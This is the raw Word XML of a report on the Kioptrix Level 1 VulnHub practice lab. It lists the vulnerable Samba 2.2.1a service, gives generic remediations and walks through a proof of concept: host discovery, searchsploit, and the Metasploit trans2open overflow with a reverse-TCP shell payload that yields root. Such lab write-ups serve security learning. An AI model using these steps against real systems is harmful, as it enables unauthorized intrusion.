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XSpec="center" w:tblpY="-1080"/>
        <w:tblW w:w="11680" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2434"/>
        <w:gridCol w:w="9246"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="983"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Describe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Vulnerability</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="841"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRDefault="00BE6D76" w:rsidP="00003D96">
            <w:r w:rsidRPr="008A363F">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Rpc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>bind</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="838"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008A363F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139</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="850"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008A363F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2.2.1a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="975"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="00AC78BC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Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="834"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Cve id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="00C06EFD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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="987"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Cvss score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="001075DF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7/10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="988"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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Remediations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="007D6709" w:rsidRDefault="00BE6D76" w:rsidP="00003D96">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>1. Update and Patch Services:</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Vulnerability: Outdated services like OpenSSH 2.9p2, Apache 1.3.20, and Samba 2.2.1a contain known vulnerabilities that can be exploited by attackers.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Remediation: Regularly update and patch all services to their latest stable versions to mitigate known vulnerabilities.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2. Disable Unnecessary Services:</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Vulnerability: Services such as Samba may be enabled without necessity, increasing the attack surface.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Remediation: Disable or uninstall services that are not required for the system's functionality to reduce potential entry points for attackers.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>3. Implement Strong Authentication Mechanisms:</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Vulnerability: Weak or default passwords can be easily guessed or cracked, granting unauthorized access.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Remediation: Enforce strong password policies and consider implementing multi-factor authentication (MFA) to enhance security.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>4. Restrict Administrative Privileges:</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Vulnerability: Users with unnecessary administrative privileges can inadvertently or maliciously compromise the system.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Remediation: Apply the principle of least privilege by granting users only the permissions necessary for their roles.</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>5. Monitor and Audit Logs:</w:t>
            </w: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  <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Vulnerability: Unauthorized activities may go unnoticed without proper monitoring.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="007D6709" w:rsidRDefault="00BE6D76" w:rsidP="00003D96">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="001075DF" w:rsidRDefault="00BE6D76" w:rsidP="00003D96">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D6709">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Remediation: Regularly monitor and audit system logs to detect and respond to suspicious activities promptly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="622"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511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POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRDefault="00BE6D76" w:rsidP="00003D96"/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Step 1 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first I find our ip in virtual machine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45A560C" wp14:editId="68A3BE6F">
                  <wp:extent cx="5731510" cy="1655445"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
                  <wp:docPr id="733490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490526" name="Picture 733490526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5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that I find victim ip with the help of netdiscover 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CCD8B61" wp14:editId="2468E706">
                  <wp:extent cx="5731510" cy="1723390"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="88106125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061258" name="Picture 881061258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2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you see I get victim ip add (192.168.1.103) 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6773A27A" wp14:editId="5A2CFF3B">
                  <wp:extent cx="5731510" cy="2192020"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="8978044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80440" name="Picture 89780440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9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 I check the website how it’s look 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B485D44" wp14:editId="722EC394">
                  <wp:extent cx="4856018" cy="2716917"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="7620"/>
                  <wp:docPr id="108476814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768145" name="Picture 108476814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279" cy="2729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that I try to gathering information with the help of dirb, gobuster, source code but I didn’t get any type of clues so now I do attack with the help of msfconsole (Metasploit)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071208B8" wp14:editId="59E5295F">
                  <wp:extent cx="4213860" cy="3001897"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="120278901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789016" name="Picture 120278901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646" cy="3007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find searchsploit of samba version that I get in while doing nmap (as you see port number 139) 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77119FF" wp14:editId="58FF2879">
                  <wp:extent cx="5731510" cy="1334135"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="201817124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171245" name="Picture 201817124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3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So now I use 0 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE6D76" w:rsidRDefault="00BE6D76" w:rsidP="00003D96">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BE6D76" w:rsidRDefault="00BE6D76" w:rsidP="00003D96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t xml:space="preserve">Options </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE6D76" w:rsidRDefault="00BE6D76" w:rsidP="00003D96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t>Set rhosts (ip)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FC085D2" wp14:editId="27DA974B">
                  <wp:extent cx="5731510" cy="1583055"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="124334170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341707" name="Picture 124334170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8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Now exploit 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7EACF19" wp14:editId="5617A40F">
                  <wp:extent cx="5731510" cy="838835"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="119172464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724647" name="Picture 119172464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As you see I get samba version (2.2.1a) now I find this  in google for getting some informations about it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3FDB335" wp14:editId="16D0D757">
                  <wp:extent cx="4480560" cy="2628966"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="197464732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647325" name="Picture 197464732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443" cy="263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 get and the name Is “trans2open overflow”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find this exploit in Metasploit for getting privilege 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Msfconsole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Search trans2fopen overflow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4E1EB56" wp14:editId="4A0E2E10">
                  <wp:extent cx="5731510" cy="1605280"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="25199943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999435" name="Picture 25199943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0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</w:rPr>
              <w:t xml:space="preserve"> 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Use 1 because it’s linux one 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 options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Set rhost (ip)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Set payload  generic/shell_reverse_tcp_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D0A0444" wp14:editId="24526020">
                  <wp:extent cx="5731510" cy="1749425"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
                  <wp:docPr id="192356573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565732" name="Picture 192356573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4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73E60AE" wp14:editId="7F0F9766">
                  <wp:extent cx="5731510" cy="323850"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="208933763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337635" name="Picture 208933763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43019FF" wp14:editId="1461FB85">
                  <wp:extent cx="5731510" cy="2003392"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="162307131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071315" name="Picture 162307131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0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 exploit</w:t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Default="00BE6D76" w:rsidP="00003D9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0DFAD36B" wp14:editId="6A8D68E4">
                  <wp:extent cx="5731510" cy="2061845"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="42584755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847553" name="Picture 42584755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6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D76" w:rsidRDefault="00BE6D76" w:rsidP="00003D96">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="00192DE0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Bruteforce done now I become directy root as you see</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE6D76" w:rsidRDefault="00BE6D76" w:rsidP="00003D96"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6D76" w:rsidTr="00003D96">
        <w:trPr>
          <w:trHeight w:val="622"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2434" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="008F7511" w:rsidRDefault="00BE6D76" w:rsidP="00003D9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Reference </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9246" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE6D76" w:rsidRPr="00B0681B" w:rsidRDefault="00BE6D76" w:rsidP="00003D96">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B0681B">
              <w:rPr>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>https://infosecwriteups.com/kioptrix-level-1-vulnhub-walkthrough-49bcc7306e72</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE6D76" w:rsidRDefault="00BE6D76" w:rsidP="00BE6D76"/>
    <w:p w:rsidR="00C26CDE" w:rsidRPr="00BE6D76" w:rsidRDefault="000613AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>CV</w:t>
      </w:r>
      <w:r w:rsidR="00CD4345">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">:- </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00320EA3" w:rsidRPr="00320EA3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>kioptrix.lvl.1.docx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00320EA3">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C26CDE" w:rsidRPr="00BE6D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D76"/>
    <w:rsid w:val="00003D96"/>
    <w:rsid w:val="000613AC"/>
    <w:rsid w:val="00091E08"/>
    <w:rsid w:val="000A129A"/>
    <w:rsid w:val="000C6BC5"/>
    <w:rsid w:val="002401AE"/>
    <w:rsid w:val="00310988"/>
    <w:rsid w:val="00320EA3"/>
    <w:rsid w:val="0040179C"/>
    <w:rsid w:val="005C6B18"/>
    <w:rsid w:val="006F6CC4"/>
    <w:rsid w:val="00997CCB"/>
    <w:rsid w:val="00A37E2A"/>
    <w:rsid w:val="00BE463B"/>
    <w:rsid w:val="00BE6D76"/>
    <w:rsid w:val="00C26CDE"/>
    <w:rsid w:val="00CD4345"/>
    <w:rsid w:val="00D67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FAD4A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D4B1EDC4-9D01-4F41-9FF7-479849E40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6D76"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BE6D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6D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6D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6D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6D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6D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6D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6D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6D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D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D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6D76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E6D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613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3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13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kioptrix.lvl.1.doc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396</Words>
  <Characters>2262</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>18</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-22T07:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-15T15:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>